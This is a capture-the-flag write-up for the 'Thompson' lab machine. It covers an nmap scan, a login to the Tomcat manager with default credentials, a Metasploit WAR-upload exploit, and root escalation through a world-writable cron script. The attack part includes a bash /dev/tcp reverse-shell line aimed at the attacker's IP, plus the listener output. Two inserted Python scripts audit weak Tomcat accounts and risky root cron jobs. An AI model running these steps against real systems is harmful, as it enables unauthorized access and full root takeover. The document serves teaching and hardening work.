CTF: Thompson
Information
- IP: 10.10.66.156
- MYIP: 10.9.85.5
First enumeration
Basics
- NMAP
```console
$ sudo nmap -p22,8009,8080 -A 10.10.66.156
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-23 00:07 CEST
Nmap scan report for 10.10.66.156
Host is up (0.045s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
|   256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_  256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http    Apache Tomcat 8.5.5
|_http-title: Apache Tomcat/8.5.5
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   38.60 ms 10.9.0.1
2   39.10 ms 10.10.66.156

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds
```
Vulnerabilities search
I first went to http://10.10.66.156:8080
and tried to access /manager/html with the default creds... it works :)
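The weakness used here is a Tomcat manager account whose password is guessable, and the manager roles are what turn a login into code execution (WAR deployment). The following audit script is an added example written for this write-up, not code from the original page or from Tomcat itself: it parses a tomcat-users.xml and flags every account holding a deploy-capable role with an empty, username-equal or short password. The XML, user names and passwords in it are constructed for the example, and the 12-character threshold is an assumed policy value.

```python
"""Flag Tomcat manager accounts with weak credentials in tomcat-users.xml.

Added example for this write-up, not code from the original page or from Tomcat.
Holders of manager-gui / manager-script can deploy WAR files through /manager,
which is exactly what the write-up exploits, so any such account with a
guessable password is reported. The sample XML below is constructed.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

# Roles that permit deploying applications through /manager (hence code execution).
DEPLOY_ROLES = {"manager-gui", "manager-script"}
MIN_PASSWORD_LEN = 12  # assumed policy threshold for this example

# Constructed sample file; the users and passwords are made up.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="webadmin" password="webadmin" roles="manager-gui,manager-script"/>
  <user username="deployer" password="Q7v!nmXz2#LpR9sW" roles="manager-script"/>
  <user username="monitor" password="status" roles="manager-status"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text: str) -> List[Dict[str, object]]:
    """Return deploy-capable accounts whose password is empty, equal to the username or short."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        # Tags carry the default namespace, e.g. {http://tomcat.apache.org/xml}user.
        if not elem.tag.endswith("}user") and elem.tag != "user":
            continue
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password") or ""
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        deploy_roles = roles & DEPLOY_ROLES
        if not deploy_roles:
            continue  # cannot deploy a WAR, out of scope for this check
        reasons = []
        if password == "":
            reasons.append("empty password")
        elif password.lower() == name.lower():
            reasons.append("password equals username")
        elif len(password) < MIN_PASSWORD_LEN:
            reasons.append(f"password shorter than {MIN_PASSWORD_LEN} characters")
        if reasons:
            findings.append({"user": name, "roles": sorted(deploy_roles), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{f['user']} ({', '.join(f['roles'])}): {'; '.join(f['reasons'])}")
```

The password checks only apply when tomcat-users.xml stores plaintext passwords; if a CredentialHandler is configured the values are digests and only the role check is meaningful. Beyond fixing the credentials, the usual hardening is to remove the manager application where it is not needed or to restrict it to trusted addresses with a RemoteAddrValve in its context.xml.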
Exploit
From here we can upload WAR files, so I could have built a reverse shell WAR file by hand; but Metasploit can automate that task ;)
```console
> use exploit/multi/http/tomcat_mgr_upload
> set HttpPassword ------
> set HttpUsername tomcat
> set RHOSTS 10.10.66.156
> set RPORT 8080
> set LHOST 10.9.85.5
> run
```
And we got a shell :)
Privilege escalation
First I could read /home/jack/user.txt ;)
Enumeration for privesc
Then I checked /etc/crontab:
```console
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    cd /home/jack && bash id.sh
```
The last command is executed by root, every minute.
Let's look at this file:
```console
$ ls -al /home/jack/id.sh
-rwxrwxrwx 1 jack jack 26 Aug 14  2019 /home/jack/id.sh
```
It's world writable :)
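The two manual steps above (read /etc/crontab, then check the permissions of the file the root job runs) are exactly what a host audit should do on every machine. The script below is an added example written for this write-up, not a tool from the original page: it parses a system crontab, resolves the files each root job touches while honouring `cd` inside the command, and reports any that are writable by, or owned by, a non-root user. The crontab text is the relevant part of the listing above; the file modes are constructed stand-ins for `os.stat`, with uid 1000 an assumed value for the user jack. Pass `real_stat` as the lookup to run it against a live system.

```python
"""Audit a system crontab for root jobs that execute files other users can modify.

Added example for this write-up, not code from the original page. It automates the
manual check shown above: find root entries, resolve the paths their commands use
(following `cd`), and flag files writable by or owned by non-root users.
"""
import os
import re
import shlex
import stat
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample: the relevant entries of the crontab shown in the write-up.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root cd /home/jack && bash id.sh
"""

# Constructed (mode, uid) pairs standing in for os.stat on the target. id.sh mirrors
# the -rwxrwxrwx jack:jack listing above; cron.hourly is a hypothetical root-owned
# 0755 directory; uid 1000 is an assumed value for the user "jack".
SAMPLE_FS: Dict[str, Tuple[int, int]] = {
    "/etc/cron.hourly": (0o755, 0),
    "/home/jack/id.sh": (0o777, 1000),
}

StatLookup = Callable[[str], Optional[Tuple[int, int]]]


def real_stat(path: str) -> Optional[Tuple[int, int]]:
    """(permission bits, owner uid) of a real path, or None if it does not exist."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return stat.S_IMODE(st.st_mode), st.st_uid


def parse_system_crontab(text: str) -> List[Dict[str, str]]:
    """Return the job entries of a system crontab (5 schedule fields, user, command)."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:  # environment assignment such as PATH=...
            continue
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        jobs.append({"schedule": " ".join(parts[:5]), "user": parts[5], "command": parts[6]})
    return jobs


def referenced_paths(command: str) -> List[str]:
    """Absolute paths a cron command may execute or read, honouring `cd` in the chain."""
    cwd = "/"  # cron runs jobs from / unless the command changes directory
    paths = []
    for segment in re.split(r"&&|\|\||;", command):
        tokens = shlex.split(segment)
        if not tokens:
            continue
        if tokens[0] == "cd":
            cwd = os.path.normpath(os.path.join(cwd, tokens[1])) if len(tokens) > 1 else "/"
            continue
        for tok in tokens:
            if tok.startswith("-"):  # skip option flags such as --report
                continue
            paths.append(os.path.normpath(os.path.join(cwd, tok)))
    return paths


def find_risky_root_jobs(crontab_text: str, lookup: StatLookup) -> List[Dict[str, object]]:
    """Root cron jobs whose referenced files are writable by, or owned by, a non-root user."""
    findings = []
    for job in parse_system_crontab(crontab_text):
        if job["user"] != "root":
            continue
        for path in referenced_paths(job["command"]):
            info = lookup(path)
            if info is None:  # bare command names resolve nowhere; ignore them
                continue
            mode, uid = info
            reasons = []
            if mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if mode & stat.S_IWGRP:
                reasons.append("group-writable")
            if uid != 0:
                reasons.append(f"owned by uid {uid}, not root")
            if reasons:
                findings.append({"schedule": job["schedule"], "command": job["command"],
                                 "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_risky_root_jobs(SAMPLE_CRONTAB, SAMPLE_FS.get):
        print(f"[{f['schedule']}] {f['command']!r} -> {f['path']}: {', '.join(f['reasons'])}")
```

On the sample it reports only the id.sh job, for all three reasons. The fix on the target is to make the script root-owned and 0755 (or 0744), and more generally to never let a root cron job run anything out of a user's home directory.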
Let's add a new line to this file :)
```shell
echo '/bin/bash -i >& /dev/tcp/10.9.85.5/1234 0>&1' >> /home/jack/id.sh
```
Exploit
Then I launched a pwncat listener on my box:
```shell
pwncat -lp 1234
```
Finally we just had to wait for a minute :)
```console
pwncat -lp 1234
[00:34:16] Welcome to pwncat !                                   __main__.py:164
[00:41:01] received connection from 10.10.66.156:48956               bind.py:84
[00:41:03] 10.10.66.156:48956: registered new host w/ db          manager.py:957
(local) pwncat$
(remote) root@ubuntu:/home/jack# whoami
root
(remote) root@ubuntu:/home/jack# cat /root/root.txt
----------------
(remote) root@ubuntu:/home/jack#
```